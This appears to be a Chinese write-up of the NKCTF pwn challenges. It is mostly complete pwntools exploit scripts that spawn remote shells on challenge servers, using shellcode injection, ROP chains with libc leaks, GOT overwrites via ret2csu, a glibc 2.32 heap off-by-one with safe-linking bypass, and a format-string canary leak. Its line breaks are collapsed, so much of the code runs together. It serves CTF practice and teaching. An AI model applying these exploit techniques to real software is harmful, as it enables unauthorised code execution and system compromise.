方向wp"/>
NKCTF pwn方向wp
ezshellcode
直接rand搞一下就出了,连爆破都不用
from pwn import *
from ctypes import *context.arch='amd64'
libc = cdll.LoadLibrary("libc.so.6")def pwn():x = libc.rand() % 100 + 1shellocde = x*b'a' + asm(shellcraft.sh())r.sendlineafter(b"u can make it in 5 min!\n",shellocde)if __name__ == '__main__':while 1:try:r = remote("node2.yuzhian",31502)pwn()r.sendline(b'cat flag')r.recvline_contains(b'flag', timeout=2)r.interactive()breakexcept:r.close()continue
a_story_of_a_pwner
直接给了libc
在给的三个位置布置好rop链
然后leave ret就行了
from pwn import *p = remote("node2.yuzhian",31435)
libc = ELF('./libc.so.6')pop_rdi = 0x0000000000401573
lea_ret = 0x000000000040139e
reread = 0x0000000000401387menu = b'> \n'p.sendlineafter(menu,b'4')
p.recvuntil(b'0x')
libc_base = int(p.recv(12),16) - libc.sym['puts']
print("libc_base-->"+hex(libc_base))sys_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b"/bin/sh"))#0x4050a8
p.sendlineafter(menu,b'1')
p.sendlineafter(b'?\n',p64(str_bin_sh))
#0x4050a0
p.sendlineafter(menu,b'2')
p.sendlineafter(b'?\n',p64(pop_rdi))
#0x4050b0
p.sendlineafter(menu,b'3')
p.sendlineafter(b'?\n',p64(sys_addr))p.sendlineafter(menu,b'4')
payload = b'a'*10 + p64(0x405098) + p64(lea_ret)
p.sendlineafter(b'...\n',payload)p.interactive()ez_stack
这题做法有点不是很道德qaq
直接盲猜libc版本是2.31-0ubuntu9.9
然后用retcsu和magic_gadget改got表
0x000000000040111c : add dword ptr [rbp - 0x3d], ebx ; nop ; retfrom pwn import *context.arch='amd64'
p = remote("node2.yuzhian",38503)
#p = process('./stack')
libc = ELF('libc.so.6')magic_gadget_addr = 0x040111c
csu_call_addr = 0x0000000000401260
pop_rbx_rbp_other4_ret = 0x000000000040127A
setbuf_addr = 0x404018def retcsu(got_addr,arg0=0,arg1=0,arg2=0):pd = flat([pop_rbx_rbp_other4_ret,0, 1,arg0, arg1, arg2,got_addr,csu_call_addr,0, 0, 0, 0, 0, 0, 0])return pddef set_to(addr,data):pd = flat([pop_rbx_rbp_other4_ret,data,addr + 0x3d,0, 0, 0, 0,magic_gadget_addr])return pdpayload = b'a'*0x18
payload += set_to(setbuf_addr,0xe3b04 - libc.symbols['setvbuf']) #ogg
payload += retcsu(setbuf_addr)
print(len(payload))p.sendline(payload)
p.interactive()baby_heap
edit里面有offbyone,只不过2.32加个指针异或而已
from pwn import *context.log_level='debug'#p = process('./heap')
p = remote("node2.yuzhian",36598)
libc = ELF('./libc-2.32.so')menu = b': 'def add(index,size):p.sendlineafter(menu,b'1')p.sendlineafter(menu,str(index).encode())p.sendlineafter(menu,str(size).encode())def delete(index):p.sendlineafter(menu,b'2')p.sendlineafter(menu,str(index).encode())def edit(index,content):p.sendlineafter(menu,b'3')p.sendlineafter(menu,str(index).encode())p.sendafter(menu,content)def show(index):p.sendlineafter(menu,b'4')p.sendlineafter(menu,str(index).encode())for i in range(7):add(i,0xe8)add(7,0x40)
add(8,0x40)
add(9,0x40)
add(10,0x10)
edit(10,b'/bin/sh\x00' + b'\n')edit(6,b'\xf1'*0xe9)for i in range(8):delete(i)add(0,0x48)
add(1,0x48)edit(9,b'\n')
show(9)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0xa - 0x70 - libc.sym['__malloc_hook']
print("libc_base-->"+hex(libc_base))edit(9,p64(libc_base + 0x70 + libc.sym['__malloc_hook'])*2 + b'\n')free_hook = libc_base + libc.sym['__free_hook']
sys_addr = libc_base + libc.sym['system']add(2,0x48)edit(0,b'\xa1'*0x49)delete(0)
delete(2)
delete(1)show(8)
heap_base = (u64(p.recv(5).ljust(8,b'\x00')) << 12)
print("heap__base-->"+hex(heap_base))add(0,0x90)
payload = p64(0)*9 + p64(0x51) + p64((heap_base >> 12)^(free_hook)) + p64(heap_base+0x10) + b'\n'
edit(0,payload)add(1,0x40)
add(2,0x40)
edit(2,p64(sys_addr) + b'\n')
delete(10)p.interactive()baby_rop
存在格式化字符串漏洞,先把cananry泄露出来
然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了
和西湖那题有一点像,但那题还要抬栈
from pwn import *#p = process('./message')
p = remote("node.yuzhian",37577)
elf = ELF('./message')
libc = ELF('libc.so.6')ret = 0x000000000040101a
pop_rdi = 0x0000000000401413
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = 0x4012b1p.sendline(b"%41$p")
p.recvuntil(b'0x')
canary = int(p.recv(16),16)
print("canary-->"+hex(canary))payload = p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x40138c+1)
p.sendline(p64(ret)*27 + payload + p64(canary))libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
print("libc_base-->"+hex(libc_base))sys_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh'))payload = p64(pop_rdi) + p64(str_bin_sh) + p64(sys_addr)
p.sendline(p64(ret)*28 + payload + p64(canary))p.interactive()only_read
给了libc,可以光明正大偷鸡了bushi
先是4个base64加密
因为只有一个read
所以考虑和ez_stack一样的做法,比爆破ogg快多了
from pwn import *context.arch='amd64'#p = process('./read')
p = remote("node2.yuzhian",32892)
libc = ELF('./libc.so.6')p.send(b"V2VsY29tZSB0byBOS0NURiE=")
sleep(0.1)
p.send(b"dGVsbCB5b3UgYSBzZWNyZXQ6")
sleep(0.1)
p.send(b"SSdNIFJVTk5JTkcgT04gR0xJQkMgMi4zMS0wdWJ1bnR1OS45")
sleep(0.1)
p.send(b"Y2FuIHlvdSBmaW5kIG1lPw==")magic_gadget_addr = 0x040117c
csu_call_addr = 0x0000000000401660
pop_rbx_rbp_other4_ret = 0x000000000040167A
setbuf_addr = 0x404018def retcsu(got_addr,arg0=0,arg1=0,arg2=0):pd = flat([pop_rbx_rbp_other4_ret,0, 1,arg0, arg1, arg2,got_addr,csu_call_addr,0, 0, 0, 0, 0, 0, 0])return pddef set_to(addr,data):pd = flat([pop_rbx_rbp_other4_ret,data,addr + 0x3d,0, 0, 0, 0,magic_gadget_addr])return pdpayload = b'a'*0x38payload += set_to(setbuf_addr,0xe3b04 - libc.symbols['setbuf'])
payload += retcsu(setbuf_addr)
p.sendline(payload)p.interactive()note
和musl一点关系都每没有
漏洞在对idx是一点检查都没有
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数
from pwn import *#p = process('./note')
p = remote("node2.yuzhian",37572)
libc = ELF('./libc.so')
context.log_level='debug'def add(index,size,content):p.sendlineafter(b': ', b'1')p.sendlineafter(b': ',str(index).encode())p.sendlineafter(b': ',str(size).encode())p.sendafter(b': ',content)def edit(index,size,content):p.sendlineafter(b': ', b'2')p.sendlineafter(b': ',str(index).encode())p.sendlineafter(b': ',str(size).encode())p.sendafter(b': ',content)def delete(index):p.sendlineafter(b': ',b'3')p.sendlineafter(b': ',str(index).encode())def show(index):p.sendlineafter(b': ',b'4')p.sendlineafter(b': ',str(index).encode())show(16)
leak = u64(p.recv(6).ljust(8,b'\x00'))edit(16,8,b'a'*8)
show(16)
p.recvuntil(b'a'*8)
heap_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x10e0
print("heap_base-->"+hex(heap_base))edit(16,16,b'a'*0x10)
show(16)
p.recvuntil(b'a'*0x10)
code_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x4120
print("code_base-->"+hex(code_base))edit(16,16,p64(leak) + p64(leak2))puts_got = code_base + 0x4028
add(0,8,p64(puts_got))idx = 1394
show(idx)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
print("libc_base-->"+hex(libc_base))sys_addr = libc.sym['system'] + libc_basefree_got = code_base + 0x4060
edit(0,8,p64(free_got))edit(idx,8,p64(sys_addr))add(0,8,b'/bin/sh\x00')
delete(0)p.interactive()9961code
限制了读⼊的⻓度0x16
还把buf改成仅可执⾏了
虽然给了libc,但构造了⼀下shellcode也能出
但我不明⽩为什么本地通不了,远程可以
from pwn import *
context.arch='amd64'
#p = process('./code')
p = remote("node2.yuzhian",30262)
shell = '''
xor esi, esi
lea edi, [r15+0xe]
cdq
mov ax, 59
syscall
'''
p.send(asm(shell) + b'/bin/sh')
p.interactive(Bytedance
2018hctf原题,考的是scanf读入大量数据出发consolidate
就不写了哈
更多推荐
NKCTF pwn方向wp
发布评论